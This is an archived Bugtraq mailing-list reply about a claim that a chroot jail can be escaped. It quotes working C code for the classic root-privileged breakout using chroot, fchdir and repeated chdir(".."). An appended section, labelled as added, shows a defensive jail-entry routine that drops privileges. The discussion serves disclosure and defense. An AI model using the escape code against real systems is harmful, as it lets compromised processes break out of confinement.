Bugtraq mailing list archives
Re: response to the bugtraq report of buffer overruns in imapd LIST command
From: imp () VILLAGE ORG (Warner Losh)
Date: Tue, 18 Apr 2000 00:21:36 -0600
In message <MailManager.956021099.15421.mrc () Ikkoku-Kan Panda COM> Mark Crispin writes:
: Last but not least, I am very interested in Kris Kennaway's claim
: that "It may also be possible to break out of the chroot jail on
: some platforms." If true, it represents a huge root-level security
: hole on those platforms. I simply do not believe the claim. I
: would like to know if there is some substance to this claim, or if
: it was mere speculation.

The claim is 100% real. I have code that will do it, and the code has been well known since at least the mid 1990's (when I first encountered it) and likely dates back much further than that.

With root privs, it is definitely possible to break out of a chroot jail by chrooting down a level or two, and then using chdir .. to climb up to root, since that gives the user an access outside of the jailed code. It does require breaking root to do that, unless the current directory is outside of the chroot'd location, in which case anybody can do this.

The code is approximately:

    #include <fcntl.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(void)
    {
        int fd, i;

        fd = open(".", O_RDONLY);   /* keep a handle on the current directory */
        mkdir("foo", 0755);
        chroot("foo");              /* cwd now outside the jail */
        fchdir(fd);
        for (i = 0; i < 12; i++)    /* climb the real directory tree */
            chdir("..");
        /* Most likely at / now */
        chroot(".");
        return 0;
    }

More subtle ways to deal with the finding / problem are left as an exercise to the reader.

Believe what you will, this is true. Variations on the above code work on all systems I've tried it on, except for FreeBSD's jail code.

Warner
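The defensive counterpart, as an added example that is not part of Warner's message or of any daemon's code: a jail-entry sequence that closes both holes he describes, the cwd being outside the jail and the jailed process still holding root so it can chroot again. The name `enter_jail`, the uid/gid values and the directory `/var/empty` are assumptions of this example.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1      /* for the setgroups() declaration on glibc */
#endif
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical jail-entry helper (not from any real daemon).
 * Order matters: chdir() into the jail first, so the cwd is never outside it
 * (the "anybody can do this" case); chroot(".") so no path lookup crosses the
 * boundary; then drop root, so a later chroot() by jailed code is refused and
 * the climb-out sequence in the message above no longer works.
 * Returns 0 on success, -1 with errno set on failure. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (chdir(dir) != 0)
        return -1;
    if (chroot(".") != 0)        /* needs root: EPERM for an ordinary user */
        return -1;
    if (chdir("/") != 0)         /* "/" is now the jail directory itself */
        return -1;
    /* Supplementary groups, then gid, then uid: once uid is unprivileged the
     * earlier two calls would fail, so uid goes last. */
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* The drop must be irreversible; if uid 0 can be regained, refuse. */
    if (setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* 65534 is the conventional "nobody" id; adjust for the target system. */
    if (enter_jail("/var/empty", 65534, 65534) != 0) {
        perror("enter_jail");
        return 1;
    }
    puts("jailed and unprivileged");
    return 0;
}
```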